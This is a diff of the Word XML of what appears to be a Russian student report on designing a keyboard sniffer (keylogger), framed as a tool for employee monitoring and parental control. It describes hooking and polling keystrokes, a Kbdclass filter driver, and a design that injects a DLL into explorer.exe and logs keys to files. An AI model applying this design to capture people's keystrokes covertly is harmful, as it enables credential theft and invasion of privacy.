           <w:sz w:val="32"/>
@@ -598,7 +576,6 @@
         </w:rPr>
         <w:t xml:space="preserve">                                                  </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -613,7 +590,6 @@
         </w:rPr>
         <w:t xml:space="preserve">   </w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -626,23 +602,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">                    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Яночкин</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> А.Л.</w:t>
+        <w:t xml:space="preserve">                    Яночкин А.Л.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1262,21 +1222,12 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Снифферы</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Снифферы клавиатуры</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1381,51 +1332,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">В этом разделе будут рассмотрены основные </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>теоретические</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> сведения, необход</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>имые для создания программы «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Сниффер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>».</w:t>
+        <w:t>В этом разделе будут рассмотрены основные теоретические сведения, необходимые для создания программы «Сниффер клавиатуры».</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1452,17 +1359,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Спецификация клавиатурных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>снифферов</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Спецификация клавиатурных снифферов</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1479,23 +1377,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Клавиатурный </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сниффер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — это программное обеспечение или аппаратн</w:t>
+        <w:t>Клавиатурный сниффер — это программное обеспечение или аппаратн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1534,23 +1416,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Клавиатурные </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>снифферы</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> подразделяются на </w:t>
+        <w:t xml:space="preserve">Клавиатурные снифферы подразделяются на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1571,17 +1437,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Принципиальная идея </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сниффера</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> Принципиальная идея сниффера</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1618,17 +1475,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">строению программных клавиатурных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>снифферов</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>строению программных клавиатурных снифферов</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1655,39 +1503,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WinAPI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>SetWindowsHook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, для того чтобы перехватить сообщения,</w:t>
+        <w:t>системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции WinAPI SetWindowsHook, для того чтобы перехватить сообщения,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1722,94 +1538,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">циклический опрос клавиатуры (с помощью функции </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WinAPI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Async</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>KeyState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GetKeyboardSta</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>te</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>циклический опрос клавиатуры (с помощью функции WinAPI Get(Async)KeyState, GetKeyboardSta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>te).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1837,17 +1573,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">ов ОС </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>ов ОС Windows</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1866,21 +1593,12 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Кейлоггеры</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1941,41 +1659,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">ный метод реализации клавиатурных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>снифферов</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Посредством вызова функции </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>SetWindowsHookEx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>ный метод реализации клавиатурных снифферов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Посредством вызова функции SetWindowsHookEx </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1983,7 +1675,6 @@
         </w:rPr>
         <w:t>сниффер</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2065,39 +1756,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GetAsynсKeyState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GetKeyState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
+        <w:t>Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций GetAsynсKeyState или GetKeyState. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2187,17 +1846,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Использование драйвер-фильтра драйвера класса клавиатуры </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Kbdclass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Использование драйвер-фильтра драйвера класса клавиатуры Kbdclass</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2231,7 +1881,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2239,52 +1888,19 @@
         </w:rPr>
         <w:t>Снифферы</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Device</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\KeyboardClass0»</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, созданного драйвером </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Kbdclass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\Device\KeyboardClass0»</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, созданного драйвером Kbdclass. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2357,23 +1973,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Для реализации клавиатурного </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сниффера</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> наиболее эффективным будет использование языков программирования </w:t>
+        <w:t xml:space="preserve"> Для реализации клавиатурного сниффера наиболее эффективным будет использование языков программирования </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2547,28 +2147,12 @@
         </w:rPr>
         <w:t>Название: «</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Сниффер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">». </w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Сниффер клавиатуры». </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2586,44 +2170,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>«</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Сниффер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">» − программа для </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>слежения за активностью пользователя</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>«Сниффер клавиатуры» − программа для слежения за активностью пользователя.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2700,14 +2247,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Цели: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>повышение производительности сотрудников на работе, при помощи контроля их активности. Родительский контроль.</w:t>
+        <w:t>Цели: повышение производительности сотрудников на работе, при помощи контроля их активности. Родительский контроль.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2745,14 +2285,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Данная программа должна </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">вести мониторинг клавиатуры, отслеживать активные окна, активные вкладки в браузерах. Программа автоматически </w:t>
+        <w:t xml:space="preserve">Данная программа должна вести мониторинг клавиатуры, отслеживать активные окна, активные вкладки в браузерах. Программа автоматически </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2830,12 +2363,101 @@
       <w:pPr>
         <w:pStyle w:val="ae"/>
         <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Данный проект включает в себя непосредственно два модуля</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модуль для установки и инжекции динамической библиотеки в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>explorer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и сама динамическая библиотека. Динамическая библиотека содержит в себе сам обработчик событий клавиатуры и модуль работы с </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>файлами.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2898,8 +2520,6 @@
         </w:rPr>
         <w:t>проектирование</w:t>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2944,8 +2564,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2955,15 +2573,21 @@
         </w:rPr>
         <w:t>SetWindowsHookEx</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">( </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2971,16 +2595,29 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>idHook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HOOKPROC</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2988,16 +2625,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>idHook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3011,7 +2646,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>HOOKPROC</w:t>
+        <w:t>HINSTANCE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3020,16 +2655,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lpfn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hMod</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3043,7 +2676,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>HINSTANCE</w:t>
+        <w:t>DWORD</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3052,39 +2685,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
